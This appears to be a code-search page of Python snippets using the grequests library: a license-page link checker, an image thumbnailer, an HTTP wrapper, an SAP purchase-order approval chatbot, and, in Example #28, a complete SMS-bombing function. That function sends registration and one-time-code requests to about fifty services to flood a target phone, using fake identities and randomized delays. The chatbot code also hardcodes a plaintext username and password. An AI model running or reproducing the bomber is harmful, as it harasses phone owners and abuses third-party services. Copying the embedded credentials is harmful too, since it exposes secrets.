    exit_status = 0
    for license_name in license_names:
        caught_errors = 0
        context_printed = False
        filename = license_name[:-len(".html")]
        deed_base_url = create_base_link(args, filename, for_deeds=True)
        # Deeds template:
        # https://github.com/creativecommons/cc.engine/blob/master/cc/engine/templates/licenses/standard_deed.html

        # Scrapping the html found on the active site
        if deed_base_url:
            context = f"\n\nChecking: deed\nURL: {deed_base_url}"
            page_url = deed_base_url
            source_html = request_text(page_url)
            license_soup = BeautifulSoup(source_html, "lxml")
            links_found = license_soup.find_all("a")
            link_count = len(links_found)
            if args.log_level <= INFO:
                print(f"{context}\nNumber of links found: {link_count}")
                context_printed = True
            base_url = deed_base_url
            valid_anchors, valid_links, context_printed = get_scrapable_links(
                args, base_url, links_found, context, context_printed)
            if valid_links:
                memoized_results = get_memoized_result(valid_links,
                                                       valid_anchors)
                stored_links = memoized_results[0]
                stored_anchors = memoized_results[1]
                stored_result = memoized_results[2]

                check_links = memoized_results[3]
                check_anchors = memoized_results[4]
                if check_links:
                    rs = (
                        # Since we're only checking for validity,
                        # we can retrieve
                        # only the headers/metadata
                        grequests.head(link, timeout=REQUESTS_TIMEOUT)
                        for link in check_links)
                    responses = list()
                    # Explicitly close connections to free up file handles and
                    # avoid Connection Errors per:
                    # https://stackoverflow.com/a/22839550
                    for response in grequests.map(
                            rs, exception_handler=exception_handler):
                        try:
                            responses.append(response.status_code)
                            response.close()
                        except AttributeError:
                            responses.append(response)
                    memoize_result(check_links, responses)
                    stored_anchors += check_anchors
                    stored_result += responses
                stored_links += check_links
                caught_errors = write_response(
                    args,
                    stored_links,
                    stored_result,
                    base_url,
                    license_name,
                    stored_anchors,
                    context,
                    context_printed,
                )

            if caught_errors:
                errors_total += caught_errors
                exit_status = 1

    return license_names, errors_total, exit_status
Example #28
def send_requests(phone: str, count: int):

    password = GenerateInfo().password()

    username = GenerateInfo().username()

    email = GenerateInfo().email()

    vodafone = (f"+{phone[:2]}(" + f"{phone[2:5]}) " + f"{phone[5:8]}-" +
                f"{phone[8:10]}-" + f"{phone[10:12]}")

    russian_name = GenerateInfo().russian_name()

    iteration = 0

    while iteration < count:

        requests = [
            grequests.head(
                "https://secure.online.ua/ajax/check_phone/",
                params={"reg_phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",
                json={
                    "phone": phone,
                    "otpId": 0
                },
                headers=head,
            ),
            grequests.post(
                "http://www.vodafone.ua/shop/ru/vodafone_customer/register/sendSms/",
                data={
                    "is_ajax": "true",
                    "phone_number": vodafone,
                },
                headers=head,
            ),
            grequests.post(
                "https://uklon.com.ua/api/v1/account/code/send",
                headers=uklon1,
                json={"phone": phone},
            ),
            grequests.post(
                "https://partner.uklon.com.ua/api/v1/registration/sendcode",
                headers=uklon2,
                json={"phone": phone},
            ),
            grequests.post(
                "https://www.moyo.ua/identity/registration",
                data={
                    "firstname": russian_name,
                    "phone": phone,
                    "email": email,
                },
                headers=head,
            ),
            grequests.post(
                "https://koronapay.com/transfers/online/api/users/otps",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://n13423.yclients.com/api/v1/book_code/312054",
                data=json.dumps({"phone": phone}),
                headers=frisor,
            ),
            grequests.post(
                "https://kasta.ua/api/v2/login/",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://izi.ua/api/auth/register",
                json={
                    "phone": "+" + phone,
                    "name": russian_name,
                    "is_terms_accepted": "true",
                },
                headers=head,
            ),
            grequests.post(
                "https://junker.kiev.ua/postmaster.php",
                data={
                    "tel": phone[2:],
                    "name": username,
                    "action": "callme",
                },
                headers=head,
            ),
            grequests.post(
                "https://allo.ua/ua/customer/account/createPostVue/?currentTheme=main&currentLocale=uk_UA",
                data={
                    "firstname": russian_name,
                    "telephone": phone,
                    "email": email,
                    "password": password,
                    "form_key": "Zqqj7CyjkKG2ImM8",
                },
                headers=head,
            ),
            grequests.post(
                "https://stores-api.zakaz.ua/user/signup/",
                json={"phone": phone},
                headers=zakaz,
            ),
            grequests.post(
                "https://youla.ru/web-api/auth/request_code",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://cloud.mail.ru/api/v2/notify/applink",
                json={
                    "phone": "+" + phone,
                    "api": 2,
                    "email": email,
                    "x-email": "x-email",
                },
                headers=head,
            ),
            grequests.post(
                "https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                url=f"https://www.sportmaster.ua/?module=users&action=SendSMSReg&phone=+{phone}",
                headers=head,
            ),
            grequests.post(
                "https://crm.getmancar.com.ua/api/veryfyaccount",
                json={
                    "phone": "+" + phone,
                    "grant_type": "password",
                    "client_id": "gcarAppMob",
                    "client_secret": "SomeRandomCharsAndNumbersMobile",
                },
                headers=head,
            ),
            grequests.post(
                "https://www.icq.com/smsreg/requestPhoneValidation.php",
                data={
                    "msisdn": phone,
                    "locale": "en",
                    "countryCode": "ru",
                    "version": "1",
                    "k": "ic1rtwz1s1Hj1O0r",
                    "r": "46763",
                },
                headers=head,
            ),
            grequests.post(
                "https://api.pozichka.ua/v1/registration/send",
                json={"RegisterSendForm": {
                    "phone": "+" + phone
                }},
                headers=head,
            ),
            grequests.post(
                "https://register.sipnet.ru/cgi-bin/exchange.dll/RegisterHelper",
                params={
                    "oper": 9,
                    "callmode": 1,
                    "phone": "+" + phone
                },
                headers=head,
            ),
            grequests.post(
                "https://city24.ua/personalaccount/account/registration",
                data={"PhoneNumber": phone},
                headers=head,
            ),
            grequests.post(
                "https://helsi.me/api/healthy/accounts/login",
                json={
                    "phone": phone,
                    "platform": "PISWeb"
                },
                headers=head,
            ),
            grequests.post(
                "https://cloud.mail.ru/api/v2/notify/applink",
                json={
                    "phone": "+" + phone,
                    "api": 2,
                    "email": email
                },
                headers=head,
            ),
            grequests.post(
                "https://auth.multiplex.ua/login",
                json={"login": phone},
                headers=head,
            ),
            grequests.post(
                "https://account.my.games/signup_send_sms/",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://cabinet.planetakino.ua/service/sms",
                params={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://youla.ru/web-api/auth/request_code",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://rutube.ru/api/accounts/sendpass/phone",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://www.mvideo.ru/internal-rest-api/common/atg/rest/actors/VerificationActor/getCode",
                params={"pageName": "registerPrivateUserPhoneVerificatio"},
                data={
                    "phone": phone,
                    "recaptcha": "off",
                    "g-recaptcha-response": ""
                },
                headers=head,
            ),
            grequests.post(
                "https://passport.twitch.tv/register?trusted_request=true",
                json={
                    "birthday": {
                        "day": 12,
                        "month": 10,
                        "year": 2000
                    },
                    "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp",
                    "include_verification_code": True,
                    "password": password,
                    "phone_number": phone,
                    "username": username,
                },
                headers=head,
            ),
            grequests.post(
                "https://lk.belkacar.ru/register",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://api.ivi.ru/mobileapi/user/register/phone/v6",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://lk.belkacar.ru/get-confirmation-code",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://secure.online.ua/ajax/check_phone/",
                params={"reg_phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://api.delitime.ru/api/v2/signup",
                data={
                    "SignupForm[username]": phone,
                    "SignupForm[device_type]": 3
                },
                headers=head,
            ),
            grequests.post(
                "https://apteka366.ru/login/register/sms/send",
                data={"phone": phone},
                headers=head,
            ),
            grequests.head(
                "https://fundayshop.com/ru/ru/secured/myaccount/myclubcard/resultClubCard.jsp?type=sendConfirmCode&phoneNumber={}"
                .format("+" + phone),
                headers=head,
            ),
            grequests.post(
                "https://gorzdrav.org/login/register/sms/send",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://eda.yandex/api/v1/user/request_authentication_code",
                json={"phone_number": phone},
                headers=head,
            ),
            grequests.post(
                "https://eda.yandex/api/v1/user/request_authentication_code",
                json={"phone_number": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://my.dianet.com.ua/send_sms/",
                data={"phone": phone},
                headers=head,
            ),
            grequests.post(
                "https://shafa.ua/api/v3/graphiql",
                json={
                    "operationName":
                    "RegistrationSendSms",
                    "variables": {
                        "phoneNumber": "+" + phone
                    },
                    "query":
                    "mutation RegistrationSendSms($phoneNumber: String!) {\n  unauthorizedSendSms(phoneNumber: $phoneNumber) {\n    isSuccess\n    userToken\n    errors {\n      field\n      messages {\n        message\n        code\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n}\n",
                },
                headers=head,
            ),
            grequests.post(
                "https://my.telegram.org/auth/send_password",
                data={"phone": "+" + phone},
                headers=head,
            ),
            grequests.head(
                f"https://cabinet.planetakino.ua/service/sms?phone={phone}",
                headers=head,
            ),
            grequests.post(
                "https://api.boosty.to/oauth/phone/authorize",
                data={"client_id": "+" + phone},
                headers=head,
            ),
            grequests.post(
                "https://md-fashion.com.ua/bpm/validate-contact",
                data={"phone": "+" + phone},
                headers=head,
            ),
        ]

        grequests.map(requests, gtimeout=3)

        iteration += 1

        if iteration >= 5 and count >= 10:

            sleep(randint(2, 4))

        print(
            f"\033[1;{choice(['32m', '33m', '34m', '35m', '36m'])}{iteration}/{count} кругов"
        )
Example #29
def thumb(request):

    # get the width height and source
    width = int(request.GET.get('width', 0))
    height = int(request.GET.get('height', 0))
    src = request.GET.get('src')

    # only continue if they passed a source
    if src:
        # the parts of our url
        parts = src.split('/')

        # some logical size limits
        if width > settings.MAX_IMAGE_SIZE:
            width = settings.MAX_IMAGE_SIZE

        if height > settings.MAX_IMAGE_SIZE:
            height = settings.MAX_IMAGE_SIZE

        # get the stuff we need out of our parts
        bucket = parts[3]
        filename = parts[-1]
        ext = filename.split('.')[-1]

        # create a thumbname for the image
        thumb_name = '%s_thumber_%s_%s.%s' % (''.join(
            filename.split('.')[0:-1]), width, height, ext)
        thumb_src = '%s/_thumber/%s' % ('/'.join(parts[0:-1]), thumb_name)

        # put the thumbs in a dir called _thumber
        thumb_path = '/%s/_thumber/%s' % ('/'.join(parts[4:-1]), thumb_name)

        response = None

        # check to see if our thumb exists with a HEAD request; a connection
        # error just means the thumb has not been generated yet
        def exception_handle(req, exception):
            return None

        #response = urllib2.urlopen(HeadRequest(thumb_src))
        response = grequests.map([grequests.head(thumb_src)],
                                 exception_handler=exception_handle)[0]

        if response is not None and response.status_code >= 400:
            response = None

        # PROCESS THE IMAGE HERE
        # handle the image being missing
        # this is where we actually do the image thumbing and upload it to amazon
        if not response:

            # setup a place to store the local file and download it
            local_thumb_path = 'tmp/' + filename

            def exception_handler_image(req, exception):
                logger.debug("Image does not exist")
                logger.exception(exception)
                raise Http404

                #image = urllib2.urlopen(src)

            image = grequests.map([grequests.get(src)],
                                  exception_handler=exception_handler_image)
            #except urllib2.HTTPError, e:

            # write out the file
            with open(local_thumb_path, 'wb') as f:
                f.write(image[0].content)

            # do the resizing, save our image
            image = Image.open(local_thumb_path)
            image = image.resize((width, height), Image.ANTIALIAS)
            image.save(local_thumb_path)

            # send it back to where it came from
            upload_image(local_thumb_path, thumb_path, bucket)

        return redirect(thumb_src)
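A note on the HEAD-existence check above: with grequests.map, a request that raises (connection error, timeout) is handed to the exception_handler, and whatever the handler returns, typically None, takes that request's slot in the result list. A minimal, self-contained sketch of that behaviour; the URLs are placeholders:

import grequests

def on_error(request, exception):
    # called for requests that raise; returning None leaves None
    # in the corresponding slot of the result list
    return None

reqs = [grequests.head('https://example.com'),
        grequests.head('https://nonexistent.invalid')]
results = grequests.map(reqs, exception_handler=on_error)

for req, res in zip(reqs, results):
    if res is None:
        print('%s failed outright' % req.url)
    elif res.status_code >= 400:
        print('%s returned %d' % (req.url, res.status_code))
    else:
        print('%s is reachable' % req.url)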
Example #30
0
    def head(self, url, **kwargs):
        """HTTP HEAD Method."""
        kwargs['auth'] = self.auth
        req = grequests.head(url, **kwargs)
        return self._run(req)
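The _run helper assumed by this wrapper is not shown in the excerpt; a minimal sketch of one way it could work, mapping the single prepared request and returning its response (the class and helper names here are assumptions, not the original):

import grequests

class Client:
    def __init__(self, auth=None):
        self.auth = auth

    def _run(self, req):
        # send one prepared AsyncRequest and return its response (None on failure)
        return grequests.map([req])[0]

    def head(self, url, **kwargs):
        """HTTP HEAD Method."""
        kwargs['auth'] = self.auth
        return self._run(grequests.head(url, **kwargs))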
Example #31
0
def query_get_task_with_details(bot_memo, present_skill, bot_nlp):

    if ((bot_memo == {} or bot_memo['index']) and present_skill == 'get_task'):

        #requests can be used for synchronous requests
        # r = requests.get("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'))
        # body1 = r.json()

        #grequests is faster
        url1 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        rs1 = (grequests.get(u, auth=('pritamsa', 'rupu@0801')) for u in url1)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque1 = grequests.map(rs1, size=1)
        response_array1 = []
        for response1 in reque1:
            print(response1)
            x1 = response1.json()
            response_array1.append(x1)
        body1 = response_array1[0]

        no_of_tasks = len(body1["d"]["results"])
        if (body1["d"]["results"]):
            #task details
            instance_id = body1["d"]["results"][0]["InstanceID"]
            task_title = body1["d"]["results"][0]["TaskTitle"]

            scrapped_po_no = task_title.split("order ", 1)[1]

            body2, body3 = take_action_async(scrapped_po_no)

            #po_header detail
            created_by_user = body2["d"]["CreatedByUser"]
            SupplierName = body2["d"]["SupplierName"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
            DocumentCurrency = body2["d"]["DocumentCurrency"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

            final_reply_string = ''
            concat_string_for_multiple_lineitems = ''
            per_item_desc_dict = {}
            all_item_details = {}
            #po item detail
            no_of_line_items = len(body3["d"]["results"])
            for i in range(no_of_line_items):
                Material = body3["d"]["results"][i]["Material_Text"]
                Plant = body3["d"]["results"][i]["Plant"]
                OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]
                netPriceItem = body3["d"]["results"][i]["NetPriceAmount"]
                documentCurrency = body3["d"]["results"][i]["DocumentCurrency"]
                price_present_item_with_currency = netPriceItem + documentCurrency

                item_no = 'item : ' + str(i + 1)
                # print(item_no)
                #item_no = dict(item_no)
                per_item_desc_dict = {
                    item_no: {
                        'Material': Material,
                        'Plant': Plant,
                        'OrderQuantity': OrderQuantity,
                        'netPriceItem': price_present_item_with_currency
                    }
                }
                all_item_details.update(per_item_desc_dict)

                #use this when sending the item details as string all in one reply
                # concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
                #     + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
                #     + 'OrderQuantity: ' + OrderQuantity + '.\n'

            get_task_string = ''
            get_task_string_with_header_detail = ''

            get_task_string = task_title + '.' + '\n'

            get_task_string_with_header_detail = 'created by user: ' + created_by_user + '.' + '\n' + 'SupplierName: ' + SupplierName \
                    + '.' + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.' + '\n'

            #final_reply_string = 'Now you have got, '+ str(no_of_tasks) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items.\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
            final_reply_string = 'Now you have got, ' + str(
                no_of_tasks
            ) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail + 'You have: ' + str(
                no_of_line_items
            ) + ' items.\n' + " Say get item details to get all the item details in this purchase order. Or, say approve to approve this task, or say ignore to skip this task and move on to your next task, or say next to get your next task with details."

            return final_reply_string, 1, instance_id, created_by_user, SupplierName, (
                PurchaseOrderNetAmount + ' ' + DocumentCurrency
            ), '', all_item_details, no_of_line_items, scrapped_po_no  #return 1 for memory index as no memo is present in the beginning

        else:
            final_reply_string = 'no more tasks to approve in your inbox.'
            return final_reply_string, 1, bot_memo, bot_memo, bot_memo, bot_memo, '', '', '', bot_memo

    elif (
        (bot_memo['index']) and
        (present_skill == 'get_next_task' or present_skill == 'ignore_task')):
        #requests can be used for synchronous requests
        # r = requests.get("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'))
        # body1 = r.json()

        #grequests is faster
        url1 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        rs1 = (grequests.get(u, auth=('pritamsa', 'rupu@0801')) for u in url1)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque1 = grequests.map(rs1, size=1)
        response_array1 = []
        for response1 in reque1:
            print(response1)
            x1 = response1.json()
            response_array1.append(x1)
        body1 = response_array1[0]
        no_of_tasks = len(body1["d"]["results"])
        if ((len(body1["d"]["results"]) == 1)):

            instance_id = body1["d"]["results"][0]["InstanceID"]
            task_title = body1["d"]["results"][0]["TaskTitle"]

            scrapped_po_no = task_title.split("order ", 1)[1]

            body2, body3 = take_action_async(scrapped_po_no)

            #po_header detail
            created_by_user = body2["d"]["CreatedByUser"]
            SupplierName = body2["d"]["SupplierName"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
            DocumentCurrency = body2["d"]["DocumentCurrency"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

            final_reply_string = ''
            concat_string_for_multiple_lineitems = ''
            per_item_desc_dict = {}
            all_item_details = {}

            #po item detail
            no_of_line_items = len(body3["d"]["results"])
            for i in range(no_of_line_items):
                Material = body3["d"]["results"][i]["Material_Text"]
                Plant = body3["d"]["results"][i]["Plant"]
                OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]
                netPriceItem = body3["d"]["results"][i]["NetPriceAmount"]
                documentCurrency = body3["d"]["results"][i]["DocumentCurrency"]
                price_present_item_with_currency = netPriceItem + documentCurrency

                item_no = 'item : ' + str(i + 1)
                # print(item_no)
                #item_no = dict(item_no)
                per_item_desc_dict = {
                    item_no: {
                        'Material': Material,
                        'Plant': Plant,
                        'OrderQuantity': OrderQuantity,
                        'netPriceItem': price_present_item_with_currency
                    }
                }
                all_item_details.update(per_item_desc_dict)

                #use this when sending the item details as string all in one reply
                # concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
                #     + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
                #     + 'OrderQuantity: ' + OrderQuantity + '.\n'

            get_task_string = ''
            get_task_string_with_header_detail = ''

            get_task_string = task_title + '.' + '\n'

            get_task_string_with_header_detail = 'created by user: ' + created_by_user + '.' + '\n' + 'SupplierName: ' + SupplierName \
                    + '.' + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.' + '\n'

            # final_reply_string = 'Now you have got, '+ str(no_of_tasks) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items.\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
            final_reply_string = 'Now you have got, ' + str(
                no_of_tasks
            ) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail + 'You have: ' + str(
                no_of_line_items
            ) + ' items.\n' + " Say get item details to get all the item details in this purchase order. Or, say approve to approve this task, or say ignore to skip this task and move on to your next task, or say next to get your next task with details."

            return final_reply_string, 1, instance_id, created_by_user, SupplierName, (
                PurchaseOrderNetAmount + ' ' + DocumentCurrency
            ), '', all_item_details, no_of_line_items, scrapped_po_no  #return 1 for memory index as no memo is present in the beginning

        elif ((len(body1["d"]["results"]) > 1)
              and bot_memo['index'] < len(body1["d"]["results"])):
            #task details
            instance_id = body1["d"]["results"][
                bot_memo['index']]["InstanceID"]
            task_title = body1["d"]["results"][
                bot_memo['index']]["TaskTitle"]
            #print(task_title)
            scrapped_po_no = task_title.split("order ", 1)[1]
            #print(scrapped_po_no)

            body2, body3 = take_action_async(scrapped_po_no)

            #po_header detail
            created_by_user = body2["d"]["CreatedByUser"]
            SupplierName = body2["d"]["SupplierName"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
            DocumentCurrency = body2["d"]["DocumentCurrency"]
            PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

            final_reply_string = ''
            concat_string_for_multiple_lineitems = ''
            per_item_desc_dict = {}
            all_item_details = {}

            #po item detail
            #only show one or two tasks
            no_of_line_items = len(body3["d"]["results"])
            for i in range(no_of_line_items):
                Material = body3["d"]["results"][i]["Material_Text"]
                Plant = body3["d"]["results"][i]["Plant"]
                OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]
                netPriceItem = body3["d"]["results"][i]["NetPriceAmount"]
                documentCurrency = body3["d"]["results"][i]["DocumentCurrency"]
                price_present_item_with_currency = netPriceItem + documentCurrency

                item_no = 'item : ' + str(i + 1)
                # print(item_no)
                #item_no = dict(item_no)
                per_item_desc_dict = {
                    item_no: {
                        'Material': Material,
                        'Plant': Plant,
                        'OrderQuantity': OrderQuantity,
                        'netPriceItem': price_present_item_with_currency
                    }
                }
                all_item_details.update(per_item_desc_dict)

                #use this when sending the item details as string all in one reply
                # concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
                #     + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
                #     + 'OrderQuantity: ' + OrderQuantity + '.\n'

            get_task_string = ''
            get_task_string_with_header_detail = ''

            get_task_string = task_title + '.' + '\n'

            get_task_string_with_header_detail = 'created by user: ' + created_by_user + '.' + '\n' + 'SupplierName: ' + SupplierName \
                    + '.' + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.' + '\n'

            # final_reply_string = get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items in this P.O.\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
            final_reply_string = 'Now you have got, ' + str(
                no_of_tasks
            ) + ' pending tasks to approve. ' + get_task_string + get_task_string_with_header_detail + 'You have: ' + str(
                no_of_line_items
            ) + ' items.\n' + " Say get item details to get all the item details in this purchase order. Or, say approve to approve this task, or say ignore to skip this task and move on to your next task, or say next to get your next task with details."

            #print(get_task_string)

            #print(final_reply_string)
            return final_reply_string, bot_memo[
                'index'] + 1, instance_id, created_by_user, SupplierName, (
                    PurchaseOrderNetAmount + ' ' + DocumentCurrency
                ), '', all_item_details, no_of_line_items, scrapped_po_no

        elif (len(body1["d"]["results"]) > 0) and (bot_memo['index'] >= len(
                body1["d"]["results"])):

            final_reply_string = 'no more tasks to approve in your inbox.'
            return final_reply_string, bot_memo['index'], len(
                body1["d"]["results"]
            ), bot_memo['created_by'], bot_memo['SupplierName'], bot_memo[
                'PurchaseOrderNetAmount'], '', '', '', bot_memo[
                    'scrapped_po_no']

        else:

            final_reply_string = 'I think there are no more pending approvals for you. Say, "get my tasks", to get your pending approvals.'
            return final_reply_string, bot_memo['index'], len(
                body1["d"]["results"]
            ), bot_memo['created_by'], bot_memo['SupplierName'], bot_memo[
                'PurchaseOrderNetAmount'], '', '', '', bot_memo[
                    'scrapped_po_no']

    #repeat intent is handled via bot memory not via code

    # elif((bot_memo['index']) and present_skill == 'repeat'):

    #     r = requests.get("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'))
    #     body1 = r.json()
    #     if (body1["d"]["results"] and bot_memo['index'] <= len(body1["d"]["results"])):
    #         #task details
    #         instance_id = body1["d"]["results"][bot_memo['index']-1]["InstanceID"]
    #         task_title = body1["d"]["results"][bot_memo['index']-1]["TaskTitle"]

    #         scrapped_po_no = task_title.split("order ",1)[1]

    #         body2,body3 = take_action_async(scrapped_po_no)

    #         #po_header detail
    #         created_by_user = body2["d"]["CreatedByUser"]
    #         SupplierName = body2["d"]["SupplierName"]
    #         PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]
    #         DocumentCurrency = body2["d"]["DocumentCurrency"]
    #         PurchaseOrderNetAmount = body2["d"]["PurchaseOrderNetAmount"]

    #         final_reply_string = ''
    #         concat_string_for_multiple_lineitems = ''

    #         #po item detail
    #         #only show one or two tasks
    #         no_of_line_items = len(body3["d"]["results"])
    #         for i in range(no_of_line_items):
    #             Material = body3["d"]["results"][i]["Material_Text"]
    #             Plant = body3["d"]["results"][i]["Plant"]
    #             OrderQuantity = body3["d"]["results"][i]["OrderQuantity"]

    #             concat_string_for_multiple_lineitems = concat_string_for_multiple_lineitems \
    #                 + 'Material: ' + Material + '.\n' + 'plant: ' + Plant + '.\n' \
    #                 + 'OrderQuantity: ' + OrderQuantity + '.\n'

    #         get_task_string = ''
    #         get_task_string_with_header_detail = ''

    #         get_task_string = task_title + '\n'

    #         get_task_string_with_header_detail = 'created_by_user: ' + created_by_user + '.' +'\n' + 'SupplierName: ' + SupplierName \
    #              +'.'   + '\n' + 'PurchaseOrderNetAmount: ' + PurchaseOrderNetAmount + ' ' + DocumentCurrency + '.' +'\n'

    #         final_reply_string = get_task_string + get_task_string_with_header_detail +'You have: ' + str(no_of_line_items) +' items\n'+ concat_string_for_multiple_lineitems + " say approve to approve this task or say ignore to skip this task and move on to your next task, or say next to get your next task with details."
    #         #print(get_task_string)

    #         #print(final_reply_string)
    #         return final_reply_string,bot_memo['index'],instance_id,created_by_user,SupplierName, (PurchaseOrderNetAmount + ' ' + DocumentCurrency)

    #     elif(body1["d"]["results"] and bot_memo['index'] >= len(body1["d"]["results"])):
    #         final_reply_string = 'no more tasks to approve...'
    #         return final_reply_string,bot_memo['index'],len(body1["d"]["results"]),created_by_user,SupplierName, (PurchaseOrderNetAmount + ' ' + DocumentCurrency)

    #     else:
    #         final_reply_string = 'I am facing some issues now please try later'
    #         return final_reply_string,bot_memo['index'],len(body1["d"]["results"]),created_by_user,SupplierName, (PurchaseOrderNetAmount + ' ' + DocumentCurrency)

    elif ((bot_memo['index']) and present_skill == 'approve'):
        after_approval_reply = 'successfully approved, please say, "get my tasks", to get your previous pending approvals from the beginning, or say next to move on to your next task.'
        approval_failure_reply = "there was an issue with the server, please try again later to approve..."
        session = requests.Session()
        header = {'x-csrf-token': 'Fetch'}
        present_task_instance_id = bot_memo['instanceID']

        # response = session.head("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json", auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header)
        # if (response.status_code != 200):
        #     return approval_failure_reply ,bot_memo['index'],present_task_instance_id,bot_memo['created_by'],bot_memo['SupplierName'], bot_memo['PurchaseOrderNetAmount'],approval_failure_reply,'','',bot_memo['scrapped_po_no']
        # elif (response.status_code == 200):
        #     cookie = session.cookies.get_dict()
        #     print(cookie)

        #     csrf = response.headers['x-csrf-token']
        #     #print(csrf)

        #     #post
        #     #approve
        #     header_2 = {'x-csrf-token':csrf}
        #     approve_po = session.post("https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="+ "'"+present_task_instance_id +"'""&DecisionKey='0001'&Comments='test%20approve'",auth=HTTPBasicAuth('pritamsa', 'rupu@0801'),headers=header_2,cookies=cookie)

        #     print('***************************************************************')
        #     print(approve_po.status_code)

        # approval request posted asynchronously
        url3 = [
            "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/TaskCollection?sap-client=400&$filter=Status%20eq%20%27READY%27&$format=json"
        ]
        head_res1 = (grequests.head(u,
                                    auth=('pritamsa', 'rupu@0801'),
                                    headers=header) for u in url3)
        #both imap and map can be used
        #reque = grequests.imap(rs,size=1)
        reque3 = grequests.map(head_res1, size=1)
        response_array3 = []
        for response3 in reque3:

            if (response3.status_code != 200):
                print("hey problem")
                return approval_failure_reply, bot_memo[
                    'index'], present_task_instance_id, bot_memo[
                        'created_by'], bot_memo['SupplierName'], bot_memo[
                            'PurchaseOrderNetAmount'], approval_failure_reply, '', '', bot_memo[
                                'scrapped_po_no']
            else:
                cookie = response3.cookies.get_dict()
                print(cookie)

                csrf = response3.headers['x-csrf-token']
                print(csrf)

                header_2 = {'x-csrf-token': csrf}

                url_post = [
                    "https://p2001172697trial-trial.apim1.hanatrial.ondemand.com/p2001172697trial/Workflow_approval/Decision?sap-client=400&SAP__Origin='S4HMYINBOCLNT200'&InstanceID="
                    + "'" + present_task_instance_id + "'"
                    "&DecisionKey='0001'&Comments='test%20approve'"
                ]
                post_res = (grequests.post(u_post,
                                           auth=('pritamsa', 'rupu@0801'),
                                           headers=header_2,
                                           cookies=cookie)
                            for u_post in url_post)

                post_reque = grequests.map(post_res, size=1)
